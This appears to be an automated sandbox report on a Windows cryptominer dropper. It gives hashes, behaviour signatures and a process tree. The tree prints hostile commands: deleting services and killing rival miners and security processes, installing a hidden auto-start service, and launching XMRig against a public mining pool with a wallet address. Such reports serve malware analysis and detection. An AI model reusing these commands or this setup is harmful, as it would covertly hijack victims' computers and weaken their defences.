Analysis
- max time kernel: 150s
- max time network: 154s
- platform: windows10-2004_x64
- resource: win10v2004-20240426-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 20-05-2024 10:26
Static task: static1
Behavioral task: behavioral1
Sample: 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe
Resource: win7-20240220-en
General
- Target: 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe
- Size: 1.3MB
- MD5: 5e960ba61a82c5340650e2ce975bb4c9
- SHA1: 300aced1503b54d91e5508f0a210330e91b71b8a
- SHA256: 1faff4cf4bfe0d40af1555dc2ca749c5a382197b51b327ad89c4734d6ba75ee3
- SHA512: 9143b2172a13f1d36380bd7dc9875d21c994b9aaed71b3d3a094de23ff58b3ec64adb166b727b1a41574447cd67e30ec8992278fa78d0f3f42928e576e5d1fa1
- SSDEEP: 24576:jJlh9bDrRloua2E61y6ssIpCLpNwDfzhC8avIZej5O:jJp/FLrWpe8xChgZej5O
Malware Config
Signatures
- XMRig Miner payload (14 IoCs)
- Creates new service(s) (2 TTPs)
- Sets file to hidden (1 TTPs, 4 IoCs)
  Modifies file attributes so that the file is not shown in Explorer etc.
  pid / Process: 3944 attrib.exe, 1284 attrib.exe, 4164 attrib.exe, 3616 attrib.exe
- Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up the country code configured in the registry, likely for geofencing.
  Key value queried: \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation (5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe)
- Executes dropped EXE (2 IoCs)
  pid / Process: 1648 mscorsvw.exe, 4040 svchost.exe
  yara_rule vmprotect: behavioral2/files/0x0007000000023469-11.dat, behavioral2/memory/1648-13-0x0000000000400000-0x000000000055E000-memory.dmp, behavioral2/memory/1648-14-0x0000000000400000-0x000000000055E000-memory.dmp, behavioral2/memory/1648-26-0x0000000000400000-0x000000000055E000-memory.dmp
- Drops file in Windows directory (16 IoCs)
  File opened for modification: C:\Windows\debug\wkde (5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe)
  File opened for modification: C:\Windows\debug\wkde\mscorsvw.ini (5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe)
  File created: C:\Windows\debug\wkde\svchost.exe (5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe)
  File opened for modification: C:\Windows\debug\wkde\svchost.exe (5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe)
  File opened for modification: C:\WINDOWS\Debug\wkde\mscorsvw.exe (attrib.exe)
  File opened for modification: C:\WINDOWS\Debug\wkde\mscorsvw.ini (attrib.exe)
  File created: C:\Windows\debug\__tmp_rar_sfx_access_check_240601796 (5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe)
  File created: C:\Windows\debug\wkde\mscorsvw.exe (5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe)
  File opened for modification: C:\WINDOWS\Debug\wkde\mscorsvw.log (mscorsvw.exe)
  File opened for modification: C:\WINDOWS\Debug\wkde\svchost.exe (attrib.exe)
  File created: C:\Windows\debug\wkde\mscorsvw.ini (5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe)
  File created: C:\Windows\debug\wkde\wk.bat (5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe)
  File opened for modification: C:\Windows\debug\wkde\wk.bat (5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe)
  File opened for modification: C:\WINDOWS\Debug\wkde\mscorsvw.log (attrib.exe)
  File created: C:\WINDOWS\Debug\wkde\mscorsvw.exe (5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe)
  File opened for modification: C:\Windows\debug\wkde\mscorsvw.exe (5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe)
- Launches sc.exe (8 IoCs)
  sc.exe is a Windows utility to control services on the system.
  pid / Process: 1352 sc.exe, 1280 sc.exe, 2540 sc.exe, 3560 sc.exe, 3224 sc.exe, 3944 sc.exe, 1040 sc.exe, 940 sc.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Kills process with taskkill (15 IoCs)
  pid / Process: 628 taskkill.exe, 4376 taskkill.exe, 4552 taskkill.exe, 3844 taskkill.exe, 4744 taskkill.exe, 4748 taskkill.exe, 3220 taskkill.exe, 4792 taskkill.exe, 2268 taskkill.exe, 4588 taskkill.exe, 4284 taskkill.exe, 4896 taskkill.exe, 544 taskkill.exe, 1924 taskkill.exe, 2224 taskkill.exe
- Runs net.exe
- Runs ping.exe (1 TTPs, 2 IoCs)
  pid / Process: 1236 PING.EXE, 3100 PING.EXE
- Suspicious use of AdjustPrivilegeToken (16 IoCs)
  Token SeDebugPrivilege: 4896 taskkill.exe, 4552 taskkill.exe, 4792 taskkill.exe, 2268 taskkill.exe, 3844 taskkill.exe, 4588 taskkill.exe, 544 taskkill.exe, 4284 taskkill.exe, 628 taskkill.exe, 4376 taskkill.exe, 3220 taskkill.exe, 1924 taskkill.exe, 4744 taskkill.exe, 2224 taskkill.exe, 4748 taskkill.exe
  Token SeLockMemoryPrivilege: 4040 svchost.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
- Views/modifies file attributes (1 TTPs, 4 IoCs)
  pid / Process: 3616 attrib.exe, 3944 attrib.exe, 1284 attrib.exe, 4164 attrib.exe
Processes
C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe"
  - Checks computer location settings
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID: 1376
    C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\WINDOWS\Debug\wkde\wk.bat" "
      - Suspicious use of WriteProcessMemory
      PID: 4320
        C:\Windows\SysWOW64\sc.exe
          Command line: sc delete Systemss
          - Launches sc.exe
          PID: 940
        C:\Windows\SysWOW64\sc.exe
          Command line: sc delete WMIserver
          - Launches sc.exe
          PID: 1352
        C:\Windows\SysWOW64\sc.exe
          Command line: sc delete WMIservers
          - Launches sc.exe
          PID: 1280
        C:\Windows\SysWOW64\sc.exe
          Command line: sc delete WMI
          - Launches sc.exe
          PID: 2540
        C:\Windows\SysWOW64\sc.exe
          Command line: sc delete Serv
          - Launches sc.exe
          PID: 3560
        C:\Windows\SysWOW64\sc.exe
          Command line: sc delete system_update
          - Launches sc.exe
          PID: 3224
        C:\Windows\SysWOW64\sc.exe
          Command line: sc delete system_updatea
          - Launches sc.exe
          PID: 3944
        C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im spoolsvs.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 4896
        C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im taskhost.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 4552
        C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im NsCpuapl.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 4792
        C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im MSASCui.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 2268
        C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im nheqminer_zcash.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 3844
        C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im nssm.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 4588
        C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im update.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 544
        C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im server.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 4284
        C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im sppscv.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 628
        C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im taskhost.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 4376
        C:\Windows\SysWOW64\net.exe
          Command line: net stop wkde
          - Suspicious use of WriteProcessMemory
          PID: 4508
            C:\Windows\SysWOW64\net1.exe
              Command line: C:\Windows\system32\net1 stop wkde
              PID: 4144
        C:\Windows\SysWOW64\PING.EXE
          Command line: ping -n 5 127.0.0.1
          - Runs ping.exe
          PID: 1236
        C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /im mscorsvw.exe /f
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 3220
        C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /im WUDFHost.exe /f
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 1924
        C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /im nheqminer.exe /f
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 4744
        C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /im NsCpuCNMiner32.exe /f
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 2224
        C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /im NsCpuCNMiner64.exe /f
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 4748
        C:\Windows\SysWOW64\PING.EXE
          Command line: ping -n 5 127.0.0.1
          - Runs ping.exe
          PID: 3100
        C:\Windows\SysWOW64\sc.exe
          Command line: sc create wkde binPath= C:\WINDOWS\Debug\wkde\mscorsvw.exe start= auto
          - Launches sc.exe
          PID: 1040
        C:\Windows\SysWOW64\net.exe
          Command line: net start wkde
          PID: 1376
            C:\Windows\SysWOW64\net1.exe
              Command line: C:\Windows\system32\net1 start wkde
              PID: 4540
        C:\Windows\SysWOW64\attrib.exe
          Command line: attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.exe
          - Sets file to hidden
          - Drops file in Windows directory
          - Views/modifies file attributes
          PID: 3944
        C:\Windows\SysWOW64\attrib.exe
          Command line: attrib +s +h C:\WINDOWS\Debug\wkde\svchost.exe
          - Sets file to hidden
          - Drops file in Windows directory
          - Views/modifies file attributes
          PID: 1284
        C:\Windows\SysWOW64\attrib.exe
          Command line: attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.ini
          - Sets file to hidden
          - Drops file in Windows directory
          - Views/modifies file attributes
          PID: 4164
        C:\Windows\SysWOW64\attrib.exe
          Command line: attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.log
          - Sets file to hidden
          - Drops file in Windows directory
          - Views/modifies file attributes
          PID: 3616
C:\WINDOWS\Debug\wkde\mscorsvw.exe
  Command line: C:\WINDOWS\Debug\wkde\mscorsvw.exe
  - Executes dropped EXE
  - Drops file in Windows directory
  PID: 1648
    C:\WINDOWS\Debug\wkde\svchost.exe
      Command line: C:\WINDOWS\Debug\wkde\svchost.exe -o pool.minexmr.com:5555 -u 42NQYEALh7aC85Q376QpbJauGPfLLHUr3ZQCctLDEWQE3gWQUqfuDGg3vavPEB5edtGbtCHFTs6UJfZtHd2fVGAzHLwXmuN -p x -k --donate-level=1%
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      PID: 4040
Network
MITRE ATT&CK Enterprise v15
Downloads